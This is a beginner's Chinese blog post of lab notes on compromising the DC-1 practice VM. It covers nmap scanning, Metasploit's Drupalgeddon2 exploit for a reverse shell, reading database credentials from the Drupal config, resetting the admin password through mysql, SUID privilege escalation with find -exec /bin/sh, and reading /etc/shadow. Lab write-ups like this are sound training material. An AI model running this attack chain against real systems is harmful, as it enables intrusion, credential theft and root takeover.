【菜鸟打靶日记】

菜鸟打靶日记+1

dc1靶场笔记

首先把VM和box的网卡设置好,不然扫不到靶机

arp-scan -I eth0 -l (指定网卡扫)
masscan 192.168.184.0/24 -p 80,22( masscan 扫描的网段 -p 扫描端口号)

1.信息收集

  1. msf搜索漏洞

  2. mysql相关查询

find提权

端口扫描,用nmap扫描端口

nmap -A -sV -T4 -p- 靶机ip

-A 全面扫描指定ip或域名的所有端口及其目标系统信息等。所需时间较长

-sV 版本探测 通过相应的端口对应相应的服务,根据服务指纹识别出相应的版本

-T4 快速扫描,常用的扫描方式,前提是需要在网络好的环境中进行扫描

-p 扫描端口号

发现有22和80端口,优先80端口

发现是drupal系统,可以进行漏洞利用

进入msf

msfconsole

搜索drupal的漏洞

search drupal

使用该模块

use exploit/unix/webapp/drupal_drupalgeddon2

查看需要设置的参数

show options
exploit   run

反弹shell run和exploit都可以进行反弹shell

shell  exploit

用本地shell实现交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

用ls查看目录 里面有flag 用cat查看flag

ls flag.txt
cat flag.txt

flag提示

Every good CMS needs a config file - and so do you.

每一个好的CMS都需要一个配置文件-你也是

查找drupal cms的配置文件

cat sites/default/settings.php

需要登录数据库,直接mysql行不通,进入交互式shell

mysql -udbuser -pR0ck3t

查看数据库

show databases;

使用drupldb这个数据库

use drupaldb;

查看当前数据库的表

show tables;

查看users表内的内容

select * from users;

列出表内指定的数据

select name,pass,mail from users;

找到目录下的脚本

加密字符串

./scripts/password-hash.sh 123456

将原来字符串的密码改成加密的字符串

update users set pass="zhifuchuan" where uid=1;

成功后进行网站登录

找到flag3

提示特殊的PERMS 将帮助查找passwd - 但是您需要-exec 该命令来确定如何获取shadow中的内容。

whoami查看权限发现sudo无命令需要su

使用find / -perm -4000查找系统所有文件中拥有suid特殊权限的文件

使用find提权

find authorze.php -exec '/bin/sh' \;

根据flag3提示去查看showdow获取信息

cat /etc/shadow

寻找最后一个flag

cd /root

ls

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值